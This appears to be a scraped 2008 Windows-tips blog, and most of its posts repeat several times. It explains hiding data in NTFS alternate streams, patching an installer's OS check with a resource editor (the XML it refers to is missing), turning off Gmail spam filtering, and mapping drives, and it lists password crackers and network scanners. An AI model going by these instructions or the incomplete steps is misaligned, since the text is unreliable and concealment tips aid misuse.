To create hidden data in the text file, follow below steps:
1) Open command prompt, you may change to any directory as you like to create the text file.
2) Type notepad MyFile.txt:StoreHiddenData then press enter. MyFile.txt is the text file you are going to create whereas StoreHiddenData is the alternate stream name.
3) A message will be pop up “Cannot find the C:\MyFile.txt:StoreHiddenData.txt file”. Do you want to create a new file?”, click OK button to proceed create the new file.
4) A notepad will be pop up. Type any data that you want to be hidden from others. Save the file and you are now successfully creating hidden data for this file.
Friday, November 28, 2008
How to hide Data in Notepad
To create hidden data in the text file, follow below steps:
1) Open command prompt, you may change to any directory as you like to create the text file.
2) Type notepad MyFile.txt:StoreHiddenData then press enter. MyFile.txt is the text file you are going to create whereas StoreHiddenData is the alternate stream name.
3) A message will be pop up “Cannot find the C:\MyFile.txt:StoreHiddenData.txt file”. Do you want to create a new file?”, click OK button to proceed create the new file.
4) A notepad will be pop up. Type any data that you want to be hidden from others. Save the file and you are now successfully creating hidden data for this file.
1) Open command prompt, you may change to any directory as you like to create the text file.
2) Type notepad MyFile.txt:StoreHiddenData then press enter. MyFile.txt is the text file you are going to create whereas StoreHiddenData is the alternate stream name.
3) A message will be pop up “Cannot find the C:\MyFile.txt:StoreHiddenData.txt file”. Do you want to create a new file?”, click OK button to proceed create the new file.
4) A notepad will be pop up. Type any data that you want to be hidden from others. Save the file and you are now successfully creating hidden data for this file.
How To switch Between DHCP And Static Ip Address
The feature of Alternate Configuration is it enable TCP/IP uses alternative configuration if no DHCP server is detected. With such a design, your laptop will be auto switched from dynamic to static IP setting automatically. To enable Alternate Configuration, follow below steps:
i) Click Start menu -> Control Panel
ii) Click Network Connections.
iii) Right click Local Area Connection and select Properties.
iv) Under General tab, scroll down until you see Internet Protocol (TCP/IP). Click on it and click Properties button.
v) Under General tab, select Obtain an IP address automatically. This setting is to obtain dynamic IP address if DHCP server is found in the network.
vi) Go to Alternate Configuration tab, select User configured. Enter the static IP of your alternate location. This setting is to allow TCP/IP uses static IP once DHCP server is not found.
After getting above steps done, if you work in office
with DHCP server enabled, your laptop will use primary configuration to obtain dynamic IP automatically. Once your laptop switch to static IP network environement such as at home or production, your laptop will be auto switched to alternate configuration with the static IP you have configured.
i) Click Start menu -> Control Panel
ii) Click Network Connections.
iii) Right click Local Area Connection and select Properties.
iv) Under General tab, scroll down until you see Internet Protocol (TCP/IP). Click on it and click Properties button.
v) Under General tab, select Obtain an IP address automatically. This setting is to obtain dynamic IP address if DHCP server is found in the network.
vi) Go to Alternate Configuration tab, select User configured. Enter the static IP of your alternate location. This setting is to allow TCP/IP uses static IP once DHCP server is not found.
After getting above steps done, if you work in office
with DHCP server enabled, your laptop will use primary configuration to obtain dynamic IP automatically. Once your laptop switch to static IP network environement such as at home or production, your laptop will be auto switched to alternate configuration with the static IP you have configured.
How To switch Between DHCP And Static Ip Address
The feature of Alternate Configuration is it enable TCP/IP uses alternative configuration if no DHCP server is detected. With such a design, your laptop will be auto switched from dynamic to static IP setting automatically. To enable Alternate Configuration, follow below steps:
i) Click Start menu -> Control Panel
ii) Click Network Connections.
iii) Right click Local Area Connection and select Properties.
iv) Under General tab, scroll down until you see Internet Protocol (TCP/IP). Click on it and click Properties button.
v) Under General tab, select Obtain an IP address automatically. This setting is to obtain dynamic IP address if DHCP server is found in the network.
vi) Go to Alternate Configuration tab, select User configured. Enter the static IP of your alternate location. This setting is to allow TCP/IP uses static IP once DHCP server is not found.
After getting above steps done, if you work in office
with DHCP server enabled, your laptop will use primary configuration to obtain dynamic IP automatically. Once your laptop switch to static IP network environement such as at home or production, your laptop will be auto switched to alternate configuration with the static IP you have configured.
i) Click Start menu -> Control Panel
ii) Click Network Connections.
iii) Right click Local Area Connection and select Properties.
iv) Under General tab, scroll down until you see Internet Protocol (TCP/IP). Click on it and click Properties button.
v) Under General tab, select Obtain an IP address automatically. This setting is to obtain dynamic IP address if DHCP server is found in the network.
vi) Go to Alternate Configuration tab, select User configured. Enter the static IP of your alternate location. This setting is to allow TCP/IP uses static IP once DHCP server is not found.
After getting above steps done, if you work in office
with DHCP server enabled, your laptop will use primary configuration to obtain dynamic IP automatically. Once your laptop switch to static IP network environement such as at home or production, your laptop will be auto switched to alternate configuration with the static IP you have configured.
How to make the Windows Live Installer works to install on unsupported operating system (only Windows XP SP2/SP3 and Windows Vista is supported),
In order to make the Windows Live Installer works to install on unsupported operating system (only Windows XP SP2/SP3 and Windows Vista is supported), use the hack below to remove the OS check from the unified Windows Live Installer executable so that it will “support” installation on unsupported OS:
1. Download Resource Hacker or XN Resource Editor
2. Run the Resource Hacker or XN Resource Editor.
3. Open the Windows Live Installer executable (WLSetup-All.exe or WLSetup-Web.exe).
4. Locate CONFIG -> CONFIG0 -> 0.
5. Delete and remove the following XML code, and leaving the rest of the text intact:
6. Compile the script and save the modified executable.
7. Run the modified executable, and the Windows Live beta wave 3 software applications can be installed anywhere on any OS and operating system check is now removed.
For user who no need to install the app in workstation environment, there is another hack. The hack is similar to the trick above, using exactly the same steps, except that on the OS validity check XML code above, don’t remove the text. Instead, change and replace the workstation value of the “os productType” to server. After saving the binary, voila, the full or web installer can now works on a server OS.
1. Download Resource Hacker or XN Resource Editor
2. Run the Resource Hacker or XN Resource Editor.
3. Open the Windows Live Installer executable (WLSetup-All.exe or WLSetup-Web.exe).
4. Locate CONFIG -> CONFIG0 -> 0.
5. Delete and remove the following XML code, and leaving the rest of the text intact:
6. Compile the script and save the modified executable.
7. Run the modified executable, and the Windows Live beta wave 3 software applications can be installed anywhere on any OS and operating system check is now removed.
For user who no need to install the app in workstation environment, there is another hack. The hack is similar to the trick above, using exactly the same steps, except that on the OS validity check XML code above, don’t remove the text. Instead, change and replace the workstation value of the “os productType” to server. After saving the binary, voila, the full or web installer can now works on a server OS.
How to make the Windows Live Installer works to install on unsupported operating system (only Windows XP SP2/SP3 and Windows Vista is supported),
In order to make the Windows Live Installer works to install on unsupported operating system (only Windows XP SP2/SP3 and Windows Vista is supported), use the hack below to remove the OS check from the unified Windows Live Installer executable so that it will “support” installation on unsupported OS:
1. Download Resource Hacker or XN Resource Editor
2. Run the Resource Hacker or XN Resource Editor.
3. Open the Windows Live Installer executable (WLSetup-All.exe or WLSetup-Web.exe).
4. Locate CONFIG -> CONFIG0 -> 0.
5. Delete and remove the following XML code, and leaving the rest of the text intact:
6. Compile the script and save the modified executable.
7. Run the modified executable, and the Windows Live beta wave 3 software applications can be installed anywhere on any OS and operating system check is now removed.
For user who no need to install the app in workstation environment, there is another hack. The hack is similar to the trick above, using exactly the same steps, except that on the OS validity check XML code above, don’t remove the text. Instead, change and replace the workstation value of the “os productType” to server. After saving the binary, voila, the full or web installer can now works on a server OS.
1. Download Resource Hacker or XN Resource Editor
2. Run the Resource Hacker or XN Resource Editor.
3. Open the Windows Live Installer executable (WLSetup-All.exe or WLSetup-Web.exe).
4. Locate CONFIG -> CONFIG0 -> 0.
5. Delete and remove the following XML code, and leaving the rest of the text intact:
6. Compile the script and save the modified executable.
7. Run the modified executable, and the Windows Live beta wave 3 software applications can be installed anywhere on any OS and operating system check is now removed.
For user who no need to install the app in workstation environment, there is another hack. The hack is similar to the trick above, using exactly the same steps, except that on the OS validity check XML code above, don’t remove the text. Instead, change and replace the workstation value of the “os productType” to server. After saving the binary, voila, the full or web installer can now works on a server OS.
How to deactivate Spam Feature In Gmail.........................
The trick is to use Gmail’s filter feature. Gmail supports filter to apply certain action on rules-matching incoming mail, and the filter can be created in order to force all email received to skip been sent to Spam folder and remain in Inbox (which is downloadable via POP3 or IMAP). To create a filter to disable or deactivate spam filter in Gmai, click on Create a filter link beside the search box (or go to Settings -> Filters -> Create a new filter).
In the Has the words: text box, enter one of the following terms:
is:spam or in:spam or label:spam
Filter Spam Message in Gmail
Click on Next Step button, and click on OK button when a dialog pops up to warn against using in:, is: or label: criteria in filter.
Gmail Filter Criteria Warning
Check and tick the checkbox for Never send it to Spam as the filter’s action. Click on Create Filter to disable and deactivate Gmail spam filter with immediate effect.
Deactivate Gmail Spam Filter
Although from now on no spam messages will be sent to Spam folder anymore (everything stays in Inbox), Gmail is still smart enough to warn users that an email is identified as spam, but stays in Inbox and not send to Spam folder due to the filter created.
In the Has the words: text box, enter one of the following terms:
is:spam or in:spam or label:spam
Filter Spam Message in Gmail
Click on Next Step button, and click on OK button when a dialog pops up to warn against using in:, is: or label: criteria in filter.
Gmail Filter Criteria Warning
Check and tick the checkbox for Never send it to Spam as the filter’s action. Click on Create Filter to disable and deactivate Gmail spam filter with immediate effect.
Deactivate Gmail Spam Filter
Although from now on no spam messages will be sent to Spam folder anymore (everything stays in Inbox), Gmail is still smart enough to warn users that an email is identified as spam, but stays in Inbox and not send to Spam folder due to the filter created.
How to deactivate Spam Feature In Gmail.........................
The trick is to use Gmail’s filter feature. Gmail supports filter to apply certain action on rules-matching incoming mail, and the filter can be created in order to force all email received to skip been sent to Spam folder and remain in Inbox (which is downloadable via POP3 or IMAP). To create a filter to disable or deactivate spam filter in Gmai, click on Create a filter link beside the search box (or go to Settings -> Filters -> Create a new filter).
In the Has the words: text box, enter one of the following terms:
is:spam or in:spam or label:spam
Filter Spam Message in Gmail
Click on Next Step button, and click on OK button when a dialog pops up to warn against using in:, is: or label: criteria in filter.
Gmail Filter Criteria Warning
Check and tick the checkbox for Never send it to Spam as the filter’s action. Click on Create Filter to disable and deactivate Gmail spam filter with immediate effect.
Deactivate Gmail Spam Filter
Although from now on no spam messages will be sent to Spam folder anymore (everything stays in Inbox), Gmail is still smart enough to warn users that an email is identified as spam, but stays in Inbox and not send to Spam folder due to the filter created.
In the Has the words: text box, enter one of the following terms:
is:spam or in:spam or label:spam
Filter Spam Message in Gmail
Click on Next Step button, and click on OK button when a dialog pops up to warn against using in:, is: or label: criteria in filter.
Gmail Filter Criteria Warning
Check and tick the checkbox for Never send it to Spam as the filter’s action. Click on Create Filter to disable and deactivate Gmail spam filter with immediate effect.
Deactivate Gmail Spam Filter
Although from now on no spam messages will be sent to Spam folder anymore (everything stays in Inbox), Gmail is still smart enough to warn users that an email is identified as spam, but stays in Inbox and not send to Spam folder due to the filter created.
How to map Drive letters for useful folders
By using Visual Subst utility
Visual Subst is a utility that allows you to map a virtual drive to the frequently access folder easily. It is very user-friendly and easy to use. To map a drive for a folder, just follow below steps:
1) Choose the drive letter as you like at the drop down list.
2) Click on magnifier glass to browse for the folder.
3) If you want the folder to be mapped each time the computer is restarted, then you need to tick ‘Apply virtual drives on Windows startup’.
4) Click to add and save the drive mapping.
5) If you want to delete the drive mapping, just select the virtual drive as shown in the utility, then click to delete the drive mapping.
6) To change the drive letter for the existing drive mapping, click on the virtual drive and select the drive letter from the drop down list then click to save the setting.
Visual Subst is compatible with Windows 2000/XP/Vista. To download Visual Subst utility, click here.
By using command line
You can use subst command in command prompt to map a drive letter to a folder:
1) Launch the command prompt.
2) The syntax to map a drive is subst [drive letter] [folder path] . For instance, if you want to map drive K for C:\Documents and Settings\Administrator\My Documents\My Pictures, type subst K: “C:\Documents and Settings\Administrator\My Documents\My Pictures” then press enter.
3) To list all drive letters have been assigned, type subst (without any argument) then press enter.
4) The syntax to delete the drive mapping is subst [drive letter] /D. Example, to delete drive K, type subst K: /D
Visual Subst is a utility that allows you to map a virtual drive to the frequently access folder easily. It is very user-friendly and easy to use. To map a drive for a folder, just follow below steps:
1) Choose the drive letter as you like at the drop down list.
2) Click on magnifier glass to browse for the folder.
3) If you want the folder to be mapped each time the computer is restarted, then you need to tick ‘Apply virtual drives on Windows startup’.
4) Click to add and save the drive mapping.
5) If you want to delete the drive mapping, just select the virtual drive as shown in the utility, then click to delete the drive mapping.
6) To change the drive letter for the existing drive mapping, click on the virtual drive and select the drive letter from the drop down list then click to save the setting.
Visual Subst is compatible with Windows 2000/XP/Vista. To download Visual Subst utility, click here.
By using command line
You can use subst command in command prompt to map a drive letter to a folder:
1) Launch the command prompt.
2) The syntax to map a drive is subst [drive letter] [folder path] . For instance, if you want to map drive K for C:\Documents and Settings\Administrator\My Documents\My Pictures, type subst K: “C:\Documents and Settings\Administrator\My Documents\My Pictures” then press enter.
3) To list all drive letters have been assigned, type subst (without any argument) then press enter.
4) The syntax to delete the drive mapping is subst [drive letter] /D. Example, to delete drive K, type subst K: /D
How to map Drive letters for useful folders
By using Visual Subst utility
Visual Subst is a utility that allows you to map a virtual drive to the frequently access folder easily. It is very user-friendly and easy to use. To map a drive for a folder, just follow below steps:
1) Choose the drive letter as you like at the drop down list.
2) Click on magnifier glass to browse for the folder.
3) If you want the folder to be mapped each time the computer is restarted, then you need to tick ‘Apply virtual drives on Windows startup’.
4) Click to add and save the drive mapping.
5) If you want to delete the drive mapping, just select the virtual drive as shown in the utility, then click to delete the drive mapping.
6) To change the drive letter for the existing drive mapping, click on the virtual drive and select the drive letter from the drop down list then click to save the setting.
Visual Subst is compatible with Windows 2000/XP/Vista. To download Visual Subst utility, click here.
By using command line
You can use subst command in command prompt to map a drive letter to a folder:
1) Launch the command prompt.
2) The syntax to map a drive is subst [drive letter] [folder path] . For instance, if you want to map drive K for C:\Documents and Settings\Administrator\My Documents\My Pictures, type subst K: “C:\Documents and Settings\Administrator\My Documents\My Pictures” then press enter.
3) To list all drive letters have been assigned, type subst (without any argument) then press enter.
4) The syntax to delete the drive mapping is subst [drive letter] /D. Example, to delete drive K, type subst K: /D
Visual Subst is a utility that allows you to map a virtual drive to the frequently access folder easily. It is very user-friendly and easy to use. To map a drive for a folder, just follow below steps:
1) Choose the drive letter as you like at the drop down list.
2) Click on magnifier glass to browse for the folder.
3) If you want the folder to be mapped each time the computer is restarted, then you need to tick ‘Apply virtual drives on Windows startup’.
4) Click to add and save the drive mapping.
5) If you want to delete the drive mapping, just select the virtual drive as shown in the utility, then click to delete the drive mapping.
6) To change the drive letter for the existing drive mapping, click on the virtual drive and select the drive letter from the drop down list then click to save the setting.
Visual Subst is compatible with Windows 2000/XP/Vista. To download Visual Subst utility, click here.
By using command line
You can use subst command in command prompt to map a drive letter to a folder:
1) Launch the command prompt.
2) The syntax to map a drive is subst [drive letter] [folder path] . For instance, if you want to map drive K for C:\Documents and Settings\Administrator\My Documents\My Pictures, type subst K: “C:\Documents and Settings\Administrator\My Documents\My Pictures” then press enter.
3) To list all drive letters have been assigned, type subst (without any argument) then press enter.
4) The syntax to delete the drive mapping is subst [drive letter] /D. Example, to delete drive K, type subst K: /D
Tuesday, November 25, 2008
Inverted Displays
Press ctrl+Alt+any of the arrow keys
The direction of the display will change...
Just REpeat with other arrows to regain...
The direction of the display will change...
Just REpeat with other arrows to regain...
Inverted Displays
Press ctrl+Alt+any of the arrow keys
The direction of the display will change...
Just REpeat with other arrows to regain...
The direction of the display will change...
Just REpeat with other arrows to regain...
Top 15 Hacking Softwares
1. Nmap
I think everyone has heard of this one, recently evolved into the 4.x series.
Nmap (”Network Mapper”) is a free open source utility for network exploration or security auditing. It was designed to rapidly scan large networks, although it works fine against single hosts. Nmap runs on most types of computers and both console and graphical versions are available. Nmap is free and open source.
Get Nmap Here
2. Nessus Remote Security Scanner
Nessus is the world’s most popular vulnerability scanner used in over 75,000 organizations world-wide.
Get Nessus Here
3. John the Ripper
Yes, JTR 1.7 was recently released!
John the Ripper is a fast password cracker, currently available for many flavors of Unix (11 are officially supported, not counting different architectures), DOS, Win32, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. Besides several crypt(3) password hash types most commonly found on various Unix flavors, supported out of the box are Kerberos AFS and Windows NT/2000/XP/2003 LM hashes, plus several more with contributed patches.
You can get JTR Here
4. Nikto
Nikto is a good CGI scanner, there are some other tools that go well with Nikto (focus on http fingerprinting or Google hacking/info gathering etc, another article for just those).
Get Nikto Here
5. SuperScan
Powerful TCP port scanner, pinger, resolver. SuperScan 4 is an update of the highly popular Windows port scanning tool, SuperScan.
Get SuperScan Here
6. p0f
P0f v2 is a versatile passive OS fingerprinting tool. P0f can identify the operating system on:
- machines that connect to your box (SYN mode),
- machines you connect to (SYN+ACK mode),
- machine you cannot connect to (RST+ mode),
- machines whose communications you can observe.
Get p0f Here
7. Wireshark (Formely Ethereal)
Wireshark is a GTK+-based network protocol analyzer, or sniffer, that lets you capture and interactively browse the contents of network frames.
Works great on both Linux and Windows (with a GUI), easy to use and can reconstruct TCP/IP Streams! Will do a tutorial on Wireshark later.
Get Wireshark Here
8. Yersinia
Yersinia is a network tool designed to take advantage of some weakeness in different Layer 2 protocols. It pretends to be a solid framework for analyzing and testing the deployed networks and systems. Currently, the following network protocols are implemented: Spanning Tree Protocol (STP), Cisco Discovery Protocol (CDP), Dynamic Trunking Protocol (DTP), Dynamic Host Configuration Protocol (DHCP), Hot Standby Router Protocol (HSRP), IEEE 802.1q, Inter-Switch Link Protocol (ISL), VLAN Trunking Protocol (VTP).
Get Yersinia Here
9. Eraser
Eraser is an advanced security tool (for Windows), which allows you to completely remove sensitive data from your hard drive by overwriting it several times with carefully selected patterns. Works with Windows 95, 98, ME, NT, 2000, XP and DOS. Eraser is Free software and its source code is released under GNU General Public License.
Get Eraser Here.
10. PuTTY
PuTTY is a free implementation of Telnet and SSH for Win32 and Unix platforms, along with an xterm terminal emulator. A must have for any h4×0r wanting to telnet or SSH from Windows without having to use the crappy default MS command line clients.
Get PuTTY Here.
11. LCP
Main purpose of LCP program is user account passwords auditing and recovery in Windows NT/2000/XP/2003. Accounts information import, Passwords recovery, Brute force session distribution, Hashes computing.
Get LCP Here
12. Cain and Abel
My personal favourite for password cracking of any kind.
Cain & Abel is a password recovery tool for Microsoft Operating Systems. It allows easy recovery of various kind of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, revealing password boxes, uncovering cached passwords and analyzing routing protocols. The program does not exploit any software vulnerabilities or bugs that could not be fixed with little effort.
Get Cain and Abel Here
13. Kismet
Kismet is an 802.11 layer2 wireless network detector, sniffer, and intrusion detection system. Kismet will work with any wireless card which supports raw monitoring (rfmon) mode, and can sniff 802.11b, 802.11a, and 802.11g traffic.
Get Kismet Here
14. NetStumbler
NetStumbler is a tool for Windows that allows you to detect Wireless Local Area Networks (WLANs) using 802.11b, 802.11a and 802.11g. It has many uses:
* Verify that your network is set up the way you intended.
* Find locations with poor coverage in your WLAN.
* Detect other networks that may be causing interference on your network.
* Detect unauthorized “rogue” access points in your workplace.
* Help aim directional antennas for long-haul WLAN links.
* Use it recreationally for WarDriving.
Get NetStumbler Here
15. hping
hping is a command-line oriented TCP/IP packet assembler/analyzer. The interface is inspired to the ping unix command, but hping isn’t only able to send ICMP echo requests. It supports TCP, UDP, ICMP and RAW-IP protocols, has a traceroute mode, the ability to send files between a covered channel, and many other features.
Get hping Here
I think everyone has heard of this one, recently evolved into the 4.x series.
Nmap (”Network Mapper”) is a free open source utility for network exploration or security auditing. It was designed to rapidly scan large networks, although it works fine against single hosts. Nmap runs on most types of computers and both console and graphical versions are available. Nmap is free and open source.
Get Nmap Here
2. Nessus Remote Security Scanner
Nessus is the world’s most popular vulnerability scanner used in over 75,000 organizations world-wide.
Get Nessus Here
3. John the Ripper
Yes, JTR 1.7 was recently released!
John the Ripper is a fast password cracker, currently available for many flavors of Unix (11 are officially supported, not counting different architectures), DOS, Win32, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. Besides several crypt(3) password hash types most commonly found on various Unix flavors, supported out of the box are Kerberos AFS and Windows NT/2000/XP/2003 LM hashes, plus several more with contributed patches.
You can get JTR Here
4. Nikto
Nikto is a good CGI scanner, there are some other tools that go well with Nikto (focus on http fingerprinting or Google hacking/info gathering etc, another article for just those).
Get Nikto Here
5. SuperScan
Powerful TCP port scanner, pinger, resolver. SuperScan 4 is an update of the highly popular Windows port scanning tool, SuperScan.
Get SuperScan Here
6. p0f
P0f v2 is a versatile passive OS fingerprinting tool. P0f can identify the operating system on:
- machines that connect to your box (SYN mode),
- machines you connect to (SYN+ACK mode),
- machine you cannot connect to (RST+ mode),
- machines whose communications you can observe.
Get p0f Here
7. Wireshark (Formely Ethereal)
Wireshark is a GTK+-based network protocol analyzer, or sniffer, that lets you capture and interactively browse the contents of network frames.
Works great on both Linux and Windows (with a GUI), easy to use and can reconstruct TCP/IP Streams! Will do a tutorial on Wireshark later.
Get Wireshark Here
8. Yersinia
Yersinia is a network tool designed to take advantage of some weakeness in different Layer 2 protocols. It pretends to be a solid framework for analyzing and testing the deployed networks and systems. Currently, the following network protocols are implemented: Spanning Tree Protocol (STP), Cisco Discovery Protocol (CDP), Dynamic Trunking Protocol (DTP), Dynamic Host Configuration Protocol (DHCP), Hot Standby Router Protocol (HSRP), IEEE 802.1q, Inter-Switch Link Protocol (ISL), VLAN Trunking Protocol (VTP).
Get Yersinia Here
9. Eraser
Eraser is an advanced security tool (for Windows), which allows you to completely remove sensitive data from your hard drive by overwriting it several times with carefully selected patterns. Works with Windows 95, 98, ME, NT, 2000, XP and DOS. Eraser is Free software and its source code is released under GNU General Public License.
Get Eraser Here.
10. PuTTY
PuTTY is a free implementation of Telnet and SSH for Win32 and Unix platforms, along with an xterm terminal emulator. A must have for any h4×0r wanting to telnet or SSH from Windows without having to use the crappy default MS command line clients.
Get PuTTY Here.
11. LCP
Main purpose of LCP program is user account passwords auditing and recovery in Windows NT/2000/XP/2003. Accounts information import, Passwords recovery, Brute force session distribution, Hashes computing.
Get LCP Here
12. Cain and Abel
My personal favourite for password cracking of any kind.
Cain & Abel is a password recovery tool for Microsoft Operating Systems. It allows easy recovery of various kind of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, revealing password boxes, uncovering cached passwords and analyzing routing protocols. The program does not exploit any software vulnerabilities or bugs that could not be fixed with little effort.
Get Cain and Abel Here
13. Kismet
Kismet is an 802.11 layer2 wireless network detector, sniffer, and intrusion detection system. Kismet will work with any wireless card which supports raw monitoring (rfmon) mode, and can sniff 802.11b, 802.11a, and 802.11g traffic.
Get Kismet Here
14. NetStumbler
NetStumbler is a tool for Windows that allows you to detect Wireless Local Area Networks (WLANs) using 802.11b, 802.11a and 802.11g. It has many uses:
* Verify that your network is set up the way you intended.
* Find locations with poor coverage in your WLAN.
* Detect other networks that may be causing interference on your network.
* Detect unauthorized “rogue” access points in your workplace.
* Help aim directional antennas for long-haul WLAN links.
* Use it recreationally for WarDriving.
Get NetStumbler Here
15. hping
hping is a command-line oriented TCP/IP packet assembler/analyzer. The interface is inspired to the ping unix command, but hping isn’t only able to send ICMP echo requests. It supports TCP, UDP, ICMP and RAW-IP protocols, has a traceroute mode, the ability to send files between a covered channel, and many other features.
Get hping Here
Top 15 Hacking Softwares
1. Nmap
I think everyone has heard of this one, recently evolved into the 4.x series.
Nmap (”Network Mapper”) is a free open source utility for network exploration or security auditing. It was designed to rapidly scan large networks, although it works fine against single hosts. Nmap runs on most types of computers and both console and graphical versions are available. Nmap is free and open source.
Get Nmap Here
2. Nessus Remote Security Scanner
Nessus is the world’s most popular vulnerability scanner used in over 75,000 organizations world-wide.
Get Nessus Here
3. John the Ripper
Yes, JTR 1.7 was recently released!
John the Ripper is a fast password cracker, currently available for many flavors of Unix (11 are officially supported, not counting different architectures), DOS, Win32, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. Besides several crypt(3) password hash types most commonly found on various Unix flavors, supported out of the box are Kerberos AFS and Windows NT/2000/XP/2003 LM hashes, plus several more with contributed patches.
You can get JTR Here
4. Nikto
Nikto is a good CGI scanner, there are some other tools that go well with Nikto (focus on http fingerprinting or Google hacking/info gathering etc, another article for just those).
Get Nikto Here
5. SuperScan
Powerful TCP port scanner, pinger, resolver. SuperScan 4 is an update of the highly popular Windows port scanning tool, SuperScan.
Get SuperScan Here
6. p0f
P0f v2 is a versatile passive OS fingerprinting tool. P0f can identify the operating system on:
- machines that connect to your box (SYN mode),
- machines you connect to (SYN+ACK mode),
- machine you cannot connect to (RST+ mode),
- machines whose communications you can observe.
Get p0f Here
7. Wireshark (Formely Ethereal)
Wireshark is a GTK+-based network protocol analyzer, or sniffer, that lets you capture and interactively browse the contents of network frames.
Works great on both Linux and Windows (with a GUI), easy to use and can reconstruct TCP/IP Streams! Will do a tutorial on Wireshark later.
Get Wireshark Here
8. Yersinia
Yersinia is a network tool designed to take advantage of some weakeness in different Layer 2 protocols. It pretends to be a solid framework for analyzing and testing the deployed networks and systems. Currently, the following network protocols are implemented: Spanning Tree Protocol (STP), Cisco Discovery Protocol (CDP), Dynamic Trunking Protocol (DTP), Dynamic Host Configuration Protocol (DHCP), Hot Standby Router Protocol (HSRP), IEEE 802.1q, Inter-Switch Link Protocol (ISL), VLAN Trunking Protocol (VTP).
Get Yersinia Here
9. Eraser
Eraser is an advanced security tool (for Windows), which allows you to completely remove sensitive data from your hard drive by overwriting it several times with carefully selected patterns. Works with Windows 95, 98, ME, NT, 2000, XP and DOS. Eraser is Free software and its source code is released under GNU General Public License.
Get Eraser Here.
10. PuTTY
PuTTY is a free implementation of Telnet and SSH for Win32 and Unix platforms, along with an xterm terminal emulator. A must have for any h4×0r wanting to telnet or SSH from Windows without having to use the crappy default MS command line clients.
Get PuTTY Here.
11. LCP
Main purpose of LCP program is user account passwords auditing and recovery in Windows NT/2000/XP/2003. Accounts information import, Passwords recovery, Brute force session distribution, Hashes computing.
Get LCP Here
12. Cain and Abel
My personal favourite for password cracking of any kind.
Cain & Abel is a password recovery tool for Microsoft Operating Systems. It allows easy recovery of various kind of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, revealing password boxes, uncovering cached passwords and analyzing routing protocols. The program does not exploit any software vulnerabilities or bugs that could not be fixed with little effort.
Get Cain and Abel Here
13. Kismet
Kismet is an 802.11 layer2 wireless network detector, sniffer, and intrusion detection system. Kismet will work with any wireless card which supports raw monitoring (rfmon) mode, and can sniff 802.11b, 802.11a, and 802.11g traffic.
Get Kismet Here
14. NetStumbler
NetStumbler is a tool for Windows that allows you to detect Wireless Local Area Networks (WLANs) using 802.11b, 802.11a and 802.11g. It has many uses:
* Verify that your network is set up the way you intended.
* Find locations with poor coverage in your WLAN.
* Detect other networks that may be causing interference on your network.
* Detect unauthorized “rogue” access points in your workplace.
* Help aim directional antennas for long-haul WLAN links.
* Use it recreationally for WarDriving.
Get NetStumbler Here
15. hping
hping is a command-line oriented TCP/IP packet assembler/analyzer. The interface is inspired to the ping unix command, but hping isn’t only able to send ICMP echo requests. It supports TCP, UDP, ICMP and RAW-IP protocols, has a traceroute mode, the ability to send files between a covered channel, and many other features.
Get hping Here
I think everyone has heard of this one, recently evolved into the 4.x series.
Nmap (”Network Mapper”) is a free open source utility for network exploration or security auditing. It was designed to rapidly scan large networks, although it works fine against single hosts. Nmap runs on most types of computers and both console and graphical versions are available. Nmap is free and open source.
Get Nmap Here
2. Nessus Remote Security Scanner
Nessus is the world’s most popular vulnerability scanner used in over 75,000 organizations world-wide.
Get Nessus Here
3. John the Ripper
Yes, JTR 1.7 was recently released!
John the Ripper is a fast password cracker, currently available for many flavors of Unix (11 are officially supported, not counting different architectures), DOS, Win32, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. Besides several crypt(3) password hash types most commonly found on various Unix flavors, supported out of the box are Kerberos AFS and Windows NT/2000/XP/2003 LM hashes, plus several more with contributed patches.
You can get JTR Here
4. Nikto
Nikto is a good CGI scanner, there are some other tools that go well with Nikto (focus on http fingerprinting or Google hacking/info gathering etc, another article for just those).
Get Nikto Here
5. SuperScan
Powerful TCP port scanner, pinger, resolver. SuperScan 4 is an update of the highly popular Windows port scanning tool, SuperScan.
Get SuperScan Here
6. p0f
P0f v2 is a versatile passive OS fingerprinting tool. P0f can identify the operating system on:
- machines that connect to your box (SYN mode),
- machines you connect to (SYN+ACK mode),
- machine you cannot connect to (RST+ mode),
- machines whose communications you can observe.
Get p0f Here
7. Wireshark (Formely Ethereal)
Wireshark is a GTK+-based network protocol analyzer, or sniffer, that lets you capture and interactively browse the contents of network frames.
Works great on both Linux and Windows (with a GUI), easy to use and can reconstruct TCP/IP Streams! Will do a tutorial on Wireshark later.
Get Wireshark Here
8. Yersinia
Yersinia is a network tool designed to take advantage of some weakeness in different Layer 2 protocols. It pretends to be a solid framework for analyzing and testing the deployed networks and systems. Currently, the following network protocols are implemented: Spanning Tree Protocol (STP), Cisco Discovery Protocol (CDP), Dynamic Trunking Protocol (DTP), Dynamic Host Configuration Protocol (DHCP), Hot Standby Router Protocol (HSRP), IEEE 802.1q, Inter-Switch Link Protocol (ISL), VLAN Trunking Protocol (VTP).
Get Yersinia Here
9. Eraser
Eraser is an advanced security tool (for Windows), which allows you to completely remove sensitive data from your hard drive by overwriting it several times with carefully selected patterns. Works with Windows 95, 98, ME, NT, 2000, XP and DOS. Eraser is Free software and its source code is released under GNU General Public License.
Get Eraser Here.
10. PuTTY
PuTTY is a free implementation of Telnet and SSH for Win32 and Unix platforms, along with an xterm terminal emulator. A must have for any h4×0r wanting to telnet or SSH from Windows without having to use the crappy default MS command line clients.
Get PuTTY Here.
11. LCP
Main purpose of LCP program is user account passwords auditing and recovery in Windows NT/2000/XP/2003. Accounts information import, Passwords recovery, Brute force session distribution, Hashes computing.
Get LCP Here
12. Cain and Abel
My personal favourite for password cracking of any kind.
Cain & Abel is a password recovery tool for Microsoft Operating Systems. It allows easy recovery of various kind of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, revealing password boxes, uncovering cached passwords and analyzing routing protocols. The program does not exploit any software vulnerabilities or bugs that could not be fixed with little effort.
Get Cain and Abel Here
13. Kismet
